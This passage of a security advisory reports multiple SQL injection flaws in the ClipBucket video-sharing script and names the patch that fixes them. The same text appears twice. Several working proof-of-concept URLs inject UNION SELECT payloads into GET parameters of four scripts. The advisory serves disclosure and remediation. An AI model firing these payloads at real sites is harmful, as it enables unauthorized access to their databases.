Multiple SQL Injection vulnerabilities in ClipBucket
in application’s database. The following PoC demonstrates the vulnerability: http://[host]/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202 1.3 The vulnerability was discovered in the /view_channel.php script while handling the user HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. The following PoC demonstrates the vulnerability: http://[host]/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202 1.4 The vulnerability exists due to an error in the view_page.php script while handling the pid HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. The following PoC demonstrates the vulnerability: http://[host]/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202 1.5 The vulnerability was discovered in the view_topic.php script while handling the tid HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. The following PoC demonstrates the vulnerability: http://[host]/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202 1.6 The vulnerability was discovered in the /watch_video.php script while handling the v HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. Notice: some of the above-mentioned vulnerabilities were described in Secunia Advisory https://secunia.com/advisories/47474/ for the previous versions of ClipBucket, however they were not fixed in the tested version. --- Solution: Apply CB SQL Injection Fix 11282012 patch or upgrade to ClipBucket 2.6 r738 with security fixes (clipbucket-2.6-r738-security-fixed-p2). More Information: http://forums.clip-bucket.com/showthread.php?12527-Security-Fix-ClipBucket-2-6-SQL-Injections-fix-%28Updated%29 http://sourceforge.net/projects/clipbucket/files/Patches/ http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/ --- References: [1] High-Tech Bridge Advisory HTB23125 - https://www.htbridge.com/advisory/HTB23125 - Multiple SQL Injection vulnerabilities in ClipBucket. [2] ClipBucket - http://clip-bucket.com - ClipBucket is free and opensource video sharing script , you can create your own youtube like website in matter of minutes. A complete video sharing solution and social networking website software. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Multiple SQL Injection vulnerabilities in ClipBucket
in application’s database. The following PoC demonstrates the vulnerability: http://[host]/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202 1.3 The vulnerability was discovered in the /view_channel.php script while handling the user HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. The following PoC demonstrates the vulnerability: http://[host]/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202 1.4 The vulnerability exists due to an error in the view_page.php script while handling the pid HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. The following PoC demonstrates the vulnerability: http://[host]/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202 1.5 The vulnerability was discovered in the view_topic.php script while handling the tid HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. The following PoC demonstrates the vulnerability: http://[host]/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202 1.6 The vulnerability was discovered in the /watch_video.php script while handling the v HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database. Notice: some of the above-mentioned vulnerabilities were described in Secunia Advisory https://secunia.com/advisories/47474/ for the previous versions of ClipBucket, however they were not fixed in the tested version. --- Solution: Apply CB SQL Injection Fix 11282012 patch or upgrade to ClipBucket 2.6 r738 with security fixes (clipbucket-2.6-r738-security-fixed-p2). More Information: http://forums.clip-bucket.com/showthread.php?12527-Security-Fix-ClipBucket-2-6-SQL-Injections-fix-%28Updated%29 http://sourceforge.net/projects/clipbucket/files/Patches/ http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/ --- References: [1] High-Tech Bridge Advisory HTB23125 - https://www.htbridge.com/advisory/HTB23125 - Multiple SQL Injection vulnerabilities in ClipBucket. [2] ClipBucket - http://clip-bucket.com - ClipBucket is free and opensource video sharing script , you can create your own youtube like website in matter of minutes. A complete video sharing solution and social networking website software. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.